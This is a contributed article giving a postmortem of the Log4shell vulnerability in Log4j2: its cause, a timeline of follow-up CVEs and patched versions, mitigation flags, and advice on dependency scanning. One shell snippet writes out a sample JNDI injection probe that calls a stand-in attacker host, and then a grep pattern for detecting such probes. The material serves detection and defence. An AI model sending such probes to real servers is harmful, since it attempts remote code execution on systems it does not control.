This article was contributed by Ariel Assaraf, CEO of Coralogix
The Log4shell vulnerability was a fitting, panicked end to what was already a difficult year. Now that the initial panic is out of the way, and there are tried and tested methods for detecting and mitigating the vulnerability, it is essential to stop and reflect on just what happened in those last few weeks of 2021: specifically, on what went well and what could have gone better. What better way to do that than with a postmortem?
Overview & impact of the Log4shell vulnerability
The Log4shell vulnerability was a weakness in the JNDI lookup functionality of Log4j2, affecting versions 2.0 through 2.14. It allowed an attacker who had control over what was printed in the logs (for example, if the server prints out an HTTP header) to execute arbitrary code on the server.
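To see why this was so dangerous, note that the attack string is just text that looks like a Log4j lookup; if a vulnerable version logs it verbatim, it resolves the lookup and fetches attacker-controlled code. A minimal sketch of sweeping existing logs for such probes (the log line, IP, and file name here are invented for illustration):

```shell
# Hypothetical access-log line showing a Log4shell probe: the attacker plants
# a JNDI lookup string in a header that the server logs verbatim.
printf '%s\n' '192.0.2.10 - User-Agent: ${jndi:ldap://attacker.example/a}' > access.log

# Sweep the log for lookup patterns. This catches only the plain form; real
# scanners also handle obfuscations such as ${${lower:j}ndi:...}.
grep -E '\$\{.*jndi' access.log
```

A match does not prove compromise, only that someone attempted the exploit against a logged field.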
Log4j2 is ubiquitous among applications and the libraries on which they depend, meaning that many applications were using Log4j2 without realizing it. Even applications not written in Java are often hosted in Java web containers, meaning that a project can have no apparent dependency on Log4j2 and still be exposed. This resulted in a massive impact across nearly every industry.
The root cause of the Log4shell vulnerability
For an issue like this, the root cause was not a single event. The original feature made its way into a release without security scrutiny. The core contributors to Log4j2 have, no doubt, been reflecting on how they can improve their security assessment processes.
Libraries like Log4j2 are also large and complex, meaning that the vast majority of teams were not using the vulnerable JNDI lookup functionality at all. The vulnerable code made its way in because of the monolithic nature of these dependencies. A more composable approach to Log4j2's functionality might have significantly reduced the potential impact of the vulnerability. Still, it would have come at the cost of ease of use for those engineers who did depend on it.
So, what went well?
The response from the industry regarding the Log4shell vulnerability was immediate and effective. Open source communities created resources, drafted blog posts, and implemented patches. This effort enabled organizations to remain ahead of the curve and proactively mitigate problems rather than frantically reacting.
In addition, the core contributors to the Log4j2 library were incredibly diligent in their releases. While it was a bit of a bumpy ride (more on this later), they quickly iterated to a sensible release that was backward compatible with all but the vulnerable functionality.
These positives speak to the elegant beauty of the open source philosophy: focused communities of experts working on behalf of an enormous pool of organizations. Sometimes they make mistakes, much like any engineering effort, but those mistakes are rapidly detected and fixed.
What didn’t go so well?
The obvious problem with the Log4shell vulnerability is its very nature. The code was baked into thousands of applications, and each one needed to be mitigated, tested, and deployed to production. For some organizations, this was business as usual. Others were still operating on slow release cycles, and this sudden change was a massive disturbance to their way of working.
There was also some confusion about the correct mitigation path during the incident as the understanding of the Log4shell vulnerability grew. Check out the timeline below to get a flavor of this confusion. This meant that organizations that had been proactive were then forced to go back and start again.
Timeline of events
December 9, 2021
The original Log4shell vulnerability was found. Advice was given to mitigate the issue by setting the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable or its corresponding configuration flag. At the same time, version 2.15 was released, which disabled this functionality by default.
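In practice, that early mitigation advice amounted to one of two equivalent settings, sketched below (the jar name is a placeholder; these flags only exist in Log4j 2.10 and later, and older versions required removing the JndiLookup class from the jar instead):

```shell
# Stop-gap mitigation for Log4j 2.10 through 2.14.x, pending an upgrade:

# Option 1: environment variable, read by Log4j at startup.
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

# Option 2: the corresponding JVM system property, same effect.
java -Dlog4j2.formatMsgNoLookups=true -jar myapp.jar
```

As the timeline below shows, this configuration-only advice did not hold for long.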
December 14, 2021
A second vulnerability was found in version 2.15 of Log4j. This was a “denial of service” vulnerability, enabling malicious agents to slow down and ultimately halt targeted systems. The advice changed from setting a configuration value to upgrading to the newly released version 2.16. This CVE was initially rated relatively low, at 3.7/10, but was re-scored at 9.8/10, meaning organizations that had made a rather sensible risk-based decision were forced to pivot again and migrate.
December 17, 2021
A third vulnerability was found in version 2.16. This was another “denial of service” attack that had a similar effect to the previous vulnerability. To mitigate this, version 2.17 was released. Because of the relatively high score given to this CVE, 7.5/10, organizations were advised to migrate to version 2.17 as soon as possible.
December 28, 2021
A fourth vulnerability was found in version 2.17. This vulnerability was less severe than its predecessors (6.6/10) and required other parts of the target system to be compromised already. It also required that configuration be loaded from a remote server, which meant it would not have as broad an impact. This led to the release of version 2.17.1.
So what’s next?
There are some serious questions that need to be asked. Firstly, is our method of dependency management fit for purpose in a world of microservices, where the same dependency is copied across dozens, hundreds, or maybe thousands of instances?
Secondly, is there a need to migrate to smaller, composable libraries rather than monolithic libraries that bring in a great deal of unwanted functionality? Most of the victims of this vulnerability were not using the JNDI lookup code in the first place. Engineers regularly smuggle torrents of unnecessary and potentially hazardous code into their binaries, especially in languages like Java, which tends to favor large, heavily configurable dependencies.
Finally, some measure of acceptance needs to come with these criticisms. Zero-day vulnerabilities will happen. They’re an inevitable result of sharing code, which is undoubtedly worth the risk. Your challenge is to decide what processes, technologies, and tooling you want to put in place to get you through the next one.
The trick is responding quickly, and there are things we can do to raise vulnerabilities to our attention promptly.
- Automatic Log4shell vulnerability scans
You can use tools like Snyk to detect vulnerabilities in your dependencies automatically. You can also configure these scans to fail your CI/CD pipelines if you want to prevent critical vulnerabilities from even being deployed. This is a blunt but powerful mechanism for preventing vulnerable code from being released.
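As a sketch, a CI step using the Snyk CLI might look like the following (this assumes the CLI is installed and authenticated in the pipeline; the severity threshold is one reasonable choice, not a requirement):

```shell
# Scan the project's declared dependencies for known vulnerabilities.
# `snyk test` exits non-zero when it finds issues at or above the threshold,
# so any CI shell running with `set -e` fails the build here.
snyk test --severity-threshold=high

# Optionally record a snapshot so newly published CVEs that affect this
# dependency tree trigger an alert between builds, not just at build time.
snyk monitor
```

The second command matters for a Log4shell-style event: the vulnerable dependency may have been in production for months before the CVE was published.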
- Follow CVE feeds
The CVE Twitter feed is a great way to keep on top of vulnerabilities as they are released. It may be a lot of information to process, but you’ll know the awful ones by all the likes and retweets.
All in all
It was a complex few weeks for engineering teams all over the globe. Still, if this vulnerability has proven anything, it is that the open source community is resilient to failure, extremely responsive, and diligent. While this was a severe vulnerability whose effects will undoubtedly linger for years to come, it was quickly mitigated and contained by the rapid response of a community of focused engineers.
Ariel Assaraf is CEO of Coralogix